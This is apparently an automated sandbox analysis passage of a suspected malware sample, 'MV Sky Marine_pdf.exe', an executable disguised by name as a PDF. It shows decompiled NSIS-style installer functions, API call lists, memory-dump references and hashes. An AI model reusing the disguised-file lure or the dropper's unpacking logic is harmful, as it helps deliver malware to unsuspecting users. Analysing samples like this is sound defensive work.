                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                  • String ID: xy
                                                                                                  • API String ID: 2531174081-925674813
                                                                                                  • Opcode ID: 40bff2556f20eb0340b9ac5e59045691797800af035be7ff80d4fa762c7d4773
                                                                                                  • Instruction ID: 6c974c1b12fe2e55137cd847d22857b9bae7c95a9329c6436bda2760abdefe46
                                                                                                  • Opcode Fuzzy Hash: 40bff2556f20eb0340b9ac5e59045691797800af035be7ff80d4fa762c7d4773
                                                                                                  • Instruction Fuzzy Hash: B9214871900518BBDF119FA5CD8499FBFA9EF05358F14807AF944B6291C2798A418FA8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405F86, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00405F86(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405884(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405842("*?|<>/\":", _t5))) == 0) {
							E004059BC(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                  0x00405f88
                                                                                                  0x00405f90
                                                                                                  0x00405fa4
                                                                                                  0x00405fa4
                                                                                                  0x00405faa
                                                                                                  0x00405fb7
                                                                                                  0x00405fb7
                                                                                                  0x00405fb8
                                                                                                  0x00405fba
                                                                                                  0x00405fbe
                                                                                                  0x00405fc0
                                                                                                  0x00405fc9
                                                                                                  0x00405fcb
                                                                                                  0x00405fe5
                                                                                                  0x00405fed
                                                                                                  0x00405fed
                                                                                                  0x00405ff2
                                                                                                  0x00405ff4
                                                                                                  0x00405ff6
                                                                                                  0x00405ffa
                                                                                                  0x00405ffb
                                                                                                  0x00405ffe
                                                                                                  0x00406006
                                                                                                  0x00406008
                                                                                                  0x0040600c
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00406012
                                                                                                  0x00406017
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00406017
                                                                                                  0x0040601c

                                                                                                  APIs
                                                                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405FDE
                                                                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405FEB
                                                                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00405FF0
                                                                                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040324A,C:\Users\user\AppData\Local\Temp\,?,004033FD), ref: 00406000
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Char$Next$Prev
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                  • API String ID: 589700163-1353090027
                                                                                                  • Opcode ID: add5774134fefb6b4a968e5ffda14362b3630782001e33bdd13cec8e60841bb7
                                                                                                  • Instruction ID: fc89eac497b9ccd795659d243f46df7f66e6e837a8045d863f1532a0380c6c09
                                                                                                  • Opcode Fuzzy Hash: add5774134fefb6b4a968e5ffda14362b3630782001e33bdd13cec8e60841bb7
                                                                                                  • Instruction Fuzzy Hash: 7111C851809B9229FB3216244C40B777FD9CF967A0F18447BE9C1B22C2C67C5C829F6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00404047, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00404047(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                  0x00404059
                                                                                                  0x004040ed
                                                                                                  0x00000000
                                                                                                  0x004040ed
                                                                                                  0x0040406a
                                                                                                  0x0040406e
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00404074
                                                                                                  0x0040407d
                                                                                                  0x00404080
                                                                                                  0x00404080
                                                                                                  0x00404086
                                                                                                  0x0040408c
                                                                                                  0x0040408c
                                                                                                  0x00404098
                                                                                                  0x0040409e
                                                                                                  0x004040a5
                                                                                                  0x004040a8
                                                                                                  0x004040ab
                                                                                                  0x004040ad
                                                                                                  0x004040ad
                                                                                                  0x004040b5
                                                                                                  0x004040bb
                                                                                                  0x004040bb
                                                                                                  0x004040c5
                                                                                                  0x004040ca
                                                                                                  0x004040cd
                                                                                                  0x004040d2
                                                                                                  0x004040d5
                                                                                                  0x004040d5
                                                                                                  0x004040e5
                                                                                                  0x004040e5
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 2320649405-0
                                                                                                  • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                  • Instruction ID: 6b96e76a269b901c22994d9b2ee5e04cd87fa54416849518722627f507c2901a
                                                                                                  • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                                                                                  • Instruction Fuzzy Hash: A32184B1904705ABCB319F68DD08B4B7BF8AF41714F04CA69EA91F22E0C734E904CB55
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 93%
                                                                                                  			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405884(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E004059DC(_t52);
				_t27 = E004059FB(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x7a27b4;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E00403227(_t47);
						E004031F5(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402F4E(_t49,  *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E004059BC( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402F4E(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x7a2828 =  *0x7a2828 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                  0x004026af
                                                                                                  0x004026b1
                                                                                                  0x004026bd
                                                                                                  0x004026c0
                                                                                                  0x004026ca
                                                                                                  0x004026ce
                                                                                                  0x004026ce
                                                                                                  0x004026d4
                                                                                                  0x004026e1
                                                                                                  0x004026e9
                                                                                                  0x004026ec
                                                                                                  0x004026f2
                                                                                                  0x00402700
                                                                                                  0x00402705
                                                                                                  0x00402709
                                                                                                  0x0040270c
                                                                                                  0x00402715
                                                                                                  0x00402721
                                                                                                  0x00402725
                                                                                                  0x00402728
                                                                                                  0x00402732
                                                                                                  0x00402751
                                                                                                  0x00402739
                                                                                                  0x0040273e
                                                                                                  0x00402746
                                                                                                  0x00402749
                                                                                                  0x0040274e
                                                                                                  0x0040274e
                                                                                                  0x00402758
                                                                                                  0x00402758
                                                                                                  0x0040276a
                                                                                                  0x00402771
                                                                                                  0x00402783
                                                                                                  0x00402783
                                                                                                  0x00402789
                                                                                                  0x00402789
                                                                                                  0x00402794
                                                                                                  0x00402795
                                                                                                  0x00402799
                                                                                                  0x0040279d
                                                                                                  0x004027a3
                                                                                                  0x004027a3
                                                                                                  0x004027aa
                                                                                                  0x00402197
                                                                                                  0x004028c1
                                                                                                  0x004028cd

                                                                                                  APIs
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                                                                                  • GlobalFree.KERNEL32 ref: 00402758
                                                                                                  • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                                                                                  • GlobalFree.KERNEL32 ref: 00402771
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3294113728-0
                                                                                                  • Opcode ID: ca436d7c3055f5cba6d880a3d3da9571fe56de1c1ad2371efc703a34a348f66a
                                                                                                  • Instruction ID: 7c14a8c99997377652a6f1b3e70a5547bba05f23c8739af497d5b63ca876fb36
                                                                                                  • Opcode Fuzzy Hash: ca436d7c3055f5cba6d880a3d3da9571fe56de1c1ad2371efc703a34a348f66a
                                                                                                  • Instruction Fuzzy Hash: BB31AB71C00029BBCF216FA5DE89DAE7E79EF05364F10422AF920762E1C6794D019BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00402C06, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00402C06(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x79594c; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x79594c = 0;
					return _t15;
				}
				__eflags =  *0x79594c; // 0x0
				if(__eflags != 0) {
					return E004060F0(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x7a27ac;
				if(_t6 >  *0x7a27ac) {
					__eflags =  *0x7a27a8;
					if( *0x7a27a8 == 0) {
						_t7 = CreateDialogParamA( *0x7a27a0, 0x6f, 0, E00402B6E, 0);
						 *0x79594c = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x7a2854 & 0x00000001;
					if(( *0x7a2854 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BEA());
						return E00405010(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                                  0x00402c12
                                                                                                  0x00402c14
                                                                                                  0x00402c1b
                                                                                                  0x00402c1e
                                                                                                  0x00402c1e
                                                                                                  0x00402c24
                                                                                                  0x00000000
                                                                                                  0x00402c24
                                                                                                  0x00402c2c
                                                                                                  0x00402c32
                                                                                                  0x00000000
                                                                                                  0x00402c35
                                                                                                  0x00402c3c
                                                                                                  0x00402c42
                                                                                                  0x00402c48
                                                                                                  0x00402c4a
                                                                                                  0x00402c50
                                                                                                  0x00402c8e
                                                                                                  0x00402c97
                                                                                                  0x00000000
                                                                                                  0x00402c9c
                                                                                                  0x00402c52
                                                                                                  0x00402c59
                                                                                                  0x00402c6a
                                                                                                  0x00000000
                                                                                                  0x00402c78
                                                                                                  0x00402c59
                                                                                                  0x00402ca4

                                                                                                  APIs
                                                                                                  • DestroyWindow.USER32(00000000,00000000), ref: 00402C1E
                                                                                                  • GetTickCount.KERNEL32 ref: 00402C3C
                                                                                                  • wsprintfA.USER32 ref: 00402C6A
                                                                                                    • Part of subcall function 00405010: lstrlenA.KERNEL32(0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000,?), ref: 00405049
                                                                                                    • Part of subcall function 00405010: lstrlenA.KERNEL32(00402C7D,0079E578,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C7D,00000000), ref: 00405059
                                                                                                    • Part of subcall function 00405010: lstrcatA.KERNEL32(0079E578,00402C7D,00402C7D,0079E578,00000000,00000000,00000000), ref: 0040506C
                                                                                                    • Part of subcall function 00405010: SetWindowTextA.USER32(0079E578,0079E578), ref: 0040507E
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050A4
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050BE
                                                                                                    • Part of subcall function 00405010: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050CC
                                                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C8E
                                                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C9C
                                                                                                    • Part of subcall function 00402BEA: MulDiv.KERNEL32(00000000,00000064,?), ref: 00402BFF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                  • String ID: ... %d%%
                                                                                                  • API String ID: 722711167-2449383134
                                                                                                  • Opcode ID: 765b7d7f9f74b859da686acef26b6715f16038be255b616ea619fc253c2165e8
                                                                                                  • Instruction ID: 5665fb5ac19c2ca49a5ebccfe187302435367b741666495adcc36f42171ef0ef
                                                                                                  • Opcode Fuzzy Hash: 765b7d7f9f74b859da686acef26b6715f16038be255b616ea619fc253c2165e8
                                                                                                  • Instruction Fuzzy Hash: 65016530809234EBD7216F65AE0DA5F7768EB01725714807BF501F11D1D6BC6942CB9F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004048DF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004048DF(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                  0x004048ed
                                                                                                  0x004048fa
                                                                                                  0x00404900
                                                                                                  0x0040493e
                                                                                                  0x0040493e
                                                                                                  0x0040494d
                                                                                                  0x00404954
                                                                                                  0x00000000
                                                                                                  0x00404956
                                                                                                  0x00404902
                                                                                                  0x00404911
                                                                                                  0x00404919
                                                                                                  0x0040491c
                                                                                                  0x0040492e
                                                                                                  0x00404934
                                                                                                  0x0040493b
                                                                                                  0x00000000
                                                                                                  0x0040493b
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048FA
                                                                                                  • GetMessagePos.USER32 ref: 00404902
                                                                                                  • ScreenToClient.USER32 ref: 0040491C
                                                                                                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040492E
                                                                                                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404954
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                  • String ID: f
                                                                                                  • API String ID: 41195575-1993550816
                                                                                                  • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                  • Instruction ID: 62be087ef55917f0637de33650f1910d5268ec9c7ce2adda7b9574df75a0d37a
                                                                                                  • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                  • Instruction Fuzzy Hash: 16019271D00219BADB00DBA4DC41BFFBBBCAB45711F10012BBB50B61D0C3B465018BA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00402B6E, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 100%
                                                                                                  			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BEA();
					_t19 = "unpacking data: %d%%";
					if( *0x7a27b0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                  0x00402b7b
                                                                                                  0x00402b89
                                                                                                  0x00402b8f
                                                                                                  0x00402b8f
                                                                                                  0x00402b9d
                                                                                                  0x00402b9f
                                                                                                  0x00402bab
                                                                                                  0x00402bb0
                                                                                                  0x00402bb2
                                                                                                  0x00402bb2
                                                                                                  0x00402bbd
                                                                                                  0x00402bcd
                                                                                                  0x00402bdf
                                                                                                  0x00402bdf
                                                                                                  0x00402be7

                                                                                                  APIs
                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                                  • wsprintfA.USER32 ref: 00402BBD
                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00402BCD
                                                                                                  • SetDlgItemTextA.USER32 ref: 00402BDF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                  • Opcode ID: b9951a27a0ad3d4b637c0e4defd9dd6d062304ffd2d4b199425f9ab5ec9f44a2
                                                                                                  • Instruction ID: 5f0132f46f34ad66c666b6fba235fd2f19fc14380ecad722e005febefb47bc85
                                                                                                  • Opcode Fuzzy Hash: b9951a27a0ad3d4b637c0e4defd9dd6d062304ffd2d4b199425f9ab5ec9f44a2
                                                                                                  • Instruction Fuzzy Hash: BCF0127090420DAAEF215F50DD09FAA3779EB10345F00807AF606A51D1D7B899559B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 100010F1, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 33%
                                                                                                  			E100010F1(void* __eax, signed int __edi, void* __esi) {
				void* _t6;

				 *(__esi + 0x3a) =  *(__esi + 0x3a) | __edi;
				0x10004b24->X = 0x14001e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5),  *0x10004b24);
				_t6 = E10001690();
				__imp___getch("Game Draw");
				exit(0);
				return _t6;
			}




